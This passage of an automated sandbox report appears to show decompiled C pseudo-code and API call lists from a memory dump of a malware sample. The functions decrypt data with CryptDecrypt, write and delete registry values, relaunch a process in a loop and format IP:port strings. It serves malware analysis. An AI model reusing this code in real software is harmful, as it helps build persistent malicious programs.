                                                                                                                                                                                                                                                                                          										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                                          										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *_a4 = _v40;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                                          0x04007976
                                                                                                                                                                                                                                                                                          0x04007981
                                                                                                                                                                                                                                                                                          0x04007987
                                                                                                                                                                                                                                                                                          0x0400798e
                                                                                                                                                                                                                                                                                          0x040079a3
                                                                                                                                                                                                                                                                                          0x040079a9
                                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                                          0x040079bf
                                                                                                                                                                                                                                                                                          0x040079c6
                                                                                                                                                                                                                                                                                          0x040079cd
                                                                                                                                                                                                                                                                                          0x040079d2
                                                                                                                                                                                                                                                                                          0x040079d5
                                                                                                                                                                                                                                                                                          0x040079df
                                                                                                                                                                                                                                                                                          0x040079ed
                                                                                                                                                                                                                                                                                          0x04007a10
                                                                                                                                                                                                                                                                                          0x04007a15
                                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                                          0x04007a29
                                                                                                                                                                                                                                                                                          0x04007a38
                                                                                                                                                                                                                                                                                          0x04007a51
                                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                                          0x04007a5a
                                                                                                                                                                                                                                                                                          0x04007a6c
                                                                                                                                                                                                                                                                                          0x04007a84
                                                                                                                                                                                                                                                                                          0x04007a8f
                                                                                                                                                                                                                                                                                          0x04007a90
                                                                                                                                                                                                                                                                                          0x04007a95
                                                                                                                                                                                                                                                                                          0x04007abc
                                                                                                                                                                                                                                                                                          0x04007ac2
                                                                                                                                                                                                                                                                                          0x04007acb
                                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                                          0x04007a69
                                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                                          0x04007ad6
                                                                                                                                                                                                                                                                                          0x04007a58
                                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                                          0x04007ae3
                                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                                          0x04007aef

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 040079A3
                                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                                            • Part of subcall function 0400A400: RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04007AE3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007A4B
                                                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 04007A90
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 04007ABC
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                                          • String ID: %s:%u$Vatwyovatk
                                                                                                                                                                                                                                                                                          • API String ID: 1891311255-2484782420
                                                                                                                                                                                                                                                                                          • Opcode ID: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                                          • Instruction ID: d327848a4ae889dd371e71d646ee9b038911c4fd72f1be7e57aa30bfb263aa34
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C410FB5E04208EBFB04DF94C945BEEBBB5EB88705F14C159E6057B2C0D779AA40CB64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005E30(signed char _a4) {
                                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                                          				signed int _v29;
                                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                                          				char* _t45;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                                          				_t31 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                          				_v8 = _t31;
                                                                                                                                                                                                                                                                                          				_t45 =  *0x4011894; // 0x4013fc4
                                                                                                                                                                                                                                                                                          				_v24 = _t45;
                                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          					_v36 = 0x20;
                                                                                                                                                                                                                                                                                          					_v28 = 0x20;
                                                                                                                                                                                                                                                                                          					_v29 = 0;
                                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                                          					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                                          						_v29 = 1;
                                                                                                                                                                                                                                                                                          						if((_a4 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                                          					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          						_v72 = 0x10;
                                                                                                                                                                                                                                                                                          						E04009BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10); // executed
                                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x04005e36
                                                                                                                                                                                                                                                                                          0x04005e3a
                                                                                                                                                                                                                                                                                          0x04005e3f
                                                                                                                                                                                                                                                                                          0x04005e42
                                                                                                                                                                                                                                                                                          0x04005e48
                                                                                                                                                                                                                                                                                          0x04005e4b
                                                                                                                                                                                                                                                                                          0x04005e5b
                                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                                          0x04005e64
                                                                                                                                                                                                                                                                                          0x04005e7e
                                                                                                                                                                                                                                                                                          0x04005e86
                                                                                                                                                                                                                                                                                          0x04005e8c
                                                                                                                                                                                                                                                                                          0x04005e93
                                                                                                                                                                                                                                                                                          0x04005e9a
                                                                                                                                                                                                                                                                                          0x04005eb2
                                                                                                                                                                                                                                                                                          0x04005eba
                                                                                                                                                                                                                                                                                          0x04005ec2
                                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                                          0x04005edc
                                                                                                                                                                                                                                                                                          0x04005ee2
                                                                                                                                                                                                                                                                                          0x04005ee4
                                                                                                                                                                                                                                                                                          0x04005ef1
                                                                                                                                                                                                                                                                                          0x04005f0b
                                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                                          0x04005f25

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                                          • Opcode ID: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                                          • Instruction ID: 89e6ea7d5f7cd1f3b8914b5f239817843937aaeba4a6099ce7b548add1ef5737
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A317370A04249AFEF04CFD4D855BFFBBB9AB44704F14815CEA40B7281D7B96A00CBA1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                          			E04004AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                                          							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                                                                                          						_t31 = E04008250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                                          						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                                          						_v16 = _t31;
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                                          						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E040062B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                                          						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                                          						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x04004ac9
                                                                                                                                                                                                                                                                                          0x04004ad0
                                                                                                                                                                                                                                                                                          0x04004ad8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                                          0x04004ae5
                                                                                                                                                                                                                                                                                          0x04004b80
                                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                                          0x04004b08
                                                                                                                                                                                                                                                                                          0x04004b0e
                                                                                                                                                                                                                                                                                          0x04004b15
                                                                                                                                                                                                                                                                                          0x04004b32
                                                                                                                                                                                                                                                                                          0x04004b37
                                                                                                                                                                                                                                                                                          0x04004b3a
                                                                                                                                                                                                                                                                                          0x04004b44
                                                                                                                                                                                                                                                                                          0x04004b4e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004b58
                                                                                                                                                                                                                                                                                          0x04004b6b
                                                                                                                                                                                                                                                                                          0x04004b78
                                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                                          0x04004b96
                                                                                                                                                                                                                                                                                          0x04004b9b

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004AD8
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 04004AF4
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(-0000000C), ref: 04004B08
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(-0000000C), ref: 04004B44
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04004B6B
                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004B78
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04004B85
                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04004B90
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                                          • Instruction ID: a8de0d0852ad7639ac4a8efdad63c4b5a832734fa442b81c8ae14f5e2abf7ac4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C213075A00208EFE704EF94D958FAEB7B9EB48305F10C658E605B7281D739EE84CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                          			E040077B0(void** _a4) {
                                                                                                                                                                                                                                                                                          				void** _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				void** _v28;
                                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                          					_v12 = 0x96;
                                                                                                                                                                                                                                                                                          					_v16 = 0x1388;
                                                                                                                                                                                                                                                                                          					_v8 = _a4;
                                                                                                                                                                                                                                                                                          					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                                          							if(_t37 == 0) {
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                                          									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                                          									Sleep(0x7530);
                                                                                                                                                                                                                                                                                          									_t40 = E04002070( *_v8);
                                                                                                                                                                                                                                                                                          									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                                          									_v8[3] = _t40;
                                                                                                                                                                                                                                                                                          									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                                          										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                                          										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          											E04002510(_v8[3], 0x400e290);
                                                                                                                                                                                                                                                                                          											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L11;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                          									L11:
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                                          						_v28 = _v8;
                                                                                                                                                                                                                                                                                          						E040097C0(_v28);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x040077ba
                                                                                                                                                                                                                                                                                          0x040077c2
                                                                                                                                                                                                                                                                                          0x040077c8
                                                                                                                                                                                                                                                                                          0x040077cf
                                                                                                                                                                                                                                                                                          0x040077d9
                                                                                                                                                                                                                                                                                          0x040077e2
                                                                                                                                                                                                                                                                                          0x040077e8
                                                                                                                                                                                                                                                                                          0x040077ef
                                                                                                                                                                                                                                                                                          0x040077fc
                                                                                                                                                                                                                                                                                          0x0400780e
                                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                                          0x04007818
                                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                                          0x04007835
                                                                                                                                                                                                                                                                                          0x04007840
                                                                                                                                                                                                                                                                                          0x0400784c
                                                                                                                                                                                                                                                                                          0x04007851
                                                                                                                                                                                                                                                                                          0x04007857
                                                                                                                                                                                                                                                                                          0x04007861
                                                                                                                                                                                                                                                                                          0x0400786d
                                                                                                                                                                                                                                                                                          0x04007879
                                                                                                                                                                                                                                                                                          0x04007887
                                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007863
                                                                                                                                                                                                                                                                                          0x04007821
                                                                                                                                                                                                                                                                                          0x04007826
                                                                                                                                                                                                                                                                                          0x0400788f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007893
                                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                                          0x040078a5
                                                                                                                                                                                                                                                                                          0x040078ae
                                                                                                                                                                                                                                                                                          0x040078b5
                                                                                                                                                                                                                                                                                          0x040078ba
                                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                                          0x040078c8

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 040077C2
                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 0400780E
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04007826
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00001388), ref: 04007835
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 04007840
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 040078A5
                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040078BD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                                          • Instruction ID: 786529089a386be0191f5a1a0158813805cafbe076d78358bbe760b2cac44d20
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62318E74A00209EBFB54CF90C848BAEB7B1FB44305F14C668E905B7280D779BE40CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04005CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                                          					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                                          					_v12 = _t29;
                                                                                                                                                                                                                                                                                          					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                                          						if(_v16 > 0) {
                                                                                                                                                                                                                                                                                          							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          							_v20 = _t34;
                                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                                          								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                                          								if(_v24 == _v16) {
